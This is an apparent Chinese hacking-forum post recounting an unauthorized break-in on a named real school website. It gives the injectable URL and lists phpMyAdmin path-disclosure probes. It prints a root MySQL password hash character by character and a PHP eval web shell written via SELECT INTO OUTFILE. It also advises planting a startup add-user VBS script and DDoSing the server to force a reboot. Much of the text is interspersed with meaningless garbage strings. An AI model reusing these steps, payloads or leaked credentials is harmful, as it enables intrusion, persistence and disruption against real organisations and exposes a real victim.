友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
; ?/ g0 W/ x5 m2 h! h发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
  s1 H3 ~# c( N' @, m
7 u- i5 `: W0 B( J9 }

常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
) d8 N9 j6 H6 u; c* d: p+ t
那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
! ?; X, R  _$ Y: D8 b: c. ]
试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
/ v  e1 Q9 A' {8 E+ O$ W+ A3./load_file()  
# o2 \1 U4 U' \' S& k4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
7 T6 \+ O: Z" y% X7 A. ?5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
: [6 g3 Q5 f3 s1 h/ D7 B& A$ v7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

' Z+ {4 _) S: U; v: i均不行...........................
3 X. ~0 @; f1 w- C7 G3 B
: `" X/ {7 R6 J2 f' ^) _+ r御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
9 d1 @, O2 O1 a- j) ]
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
0 H, V* c9 Y1 Q# e% F  f
自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
( E& c( \$ r% a
: v1 C, ?1 K8 x* i0 Z. g1 C成功读到root密码：

' v2 y- o: V  M, N4 q17---- r(0072)
! G- u6 P) [3 N18---- o(006f)
% e2 o" @+ f0 x2 b" g) c$ X19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
23---- 2(0032)
% ?; a9 W" ^6 P6 w7 f$ L) _: c1 V24---- E(0045)
8 L/ D, o8 {; J2 r$ X25---- 1(0031)
26---- C(0043)
6 \, ~, b1 r3 C! m27---- 5(0035)
! A, `- z& X* \8 ]* H0 C28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
31---- A(0041)
32---- 9(0039)
. B3 j) I6 Q2 z& V( ^4 N. k. |' Z7 H33---- B(0042)
34---- 5(0035)
6 x3 D+ y! h  v% @, p35---- 4(0034)
9 u" E; L# J4 y$ u2 i% }4 O36---- 8(0038)
37---- 6(0036)
) o# g/ m7 ]* C2 q38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
" {8 W  @1 x, s2 a42---- 5(0035)
43---- 3(0033)
/ m4 j" [3 _: a, \9 H44---- 5(0035)
' m% g4 t9 ]6 m* ]( b45---- 9(0039)
, I- R/ }1 ~3 ~; G# f46---- 8(0038)
47---- F(0046)
) c; E/ h! r/ F48---- F(0046)
% R; [2 Q( W' D& e& i. V$ d% A49---- 4(0034)
' J0 X4 ^' q5 P: G$ J# c50---- F(0046)
6 M) I2 o0 `* d8 }, q. ?51---- 0(0030)
6 g2 w' E' h1 P& \1 o6 v+ K% m52---- 3(0033)
53---- 2(0032)
54---- A(0041)
4 b& C1 F- f; b5 K55---- 4(0034)
56---- A(0041)
) M, h9 W3 J( |" V& i57---- B(0042)
1 \+ A" a, K, C; M; f58---- *(0044)
59---- *(0035)
" ~4 f. B. t2 I, f4 D60---- *(0041)
( D3 A$ |- w' N& p! q61---- *0032)

6 v# x  E4 c" q解密后成功登陆phpmyamin
                          

1 I6 Z- M" e) L) }( I% e) o                             

, ?" J: P' Y0 f* w) o找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
$ i3 M, O4 p2 A& X8 U; z
# k- Q2 T5 a% M3 K" n2 C. p成功执行，拿下shell，菜刀连接：

$ n# F9 D! F2 ]服务器不支持asp,aspx,php提权无果...................

0 ^+ i' C0 q7 S1 s0 G7 w* V但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
% a! ]: _3 X: K" g# v  N' Q! m. C

服务器上已经有个隐藏帐号了

别名     administrators
+ z) |, T2 n% \6 {2 w7 M6 j注释     管理员对计算机/域有不受限制的完全访问权

; c5 G* s" s/ P) X

成员

-------------------------------------------------------------------------------
admin
7 l( g0 w- W) A- a* ?* tAdministrator
, c- a2 K( x+ C  q( C# F6 W+ I. Sslipper$
% `" I/ M- j+ x+ W/ c! O! W; K  X- Fsqluser
' S: {+ F+ g& ]. ~, Y! }命令成功完成。
- k+ i9 y$ n2 q; C2 Q& ?" W  R
& a; t$ Q$ j0 R+ H' r2 G2 v1 Y) L& b服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

' d) |: R9 z' |4 C0 P+ S7 F) uddos服务器重启，不然就只能坐等服务器重启了...............................
( M  \  n0 M, Y% i
+ t0 F2 c$ U( E( P# U# V9 q3 ^$ t      

/ v8 e$ l; e+ `2 u# J! B' w+ J

angel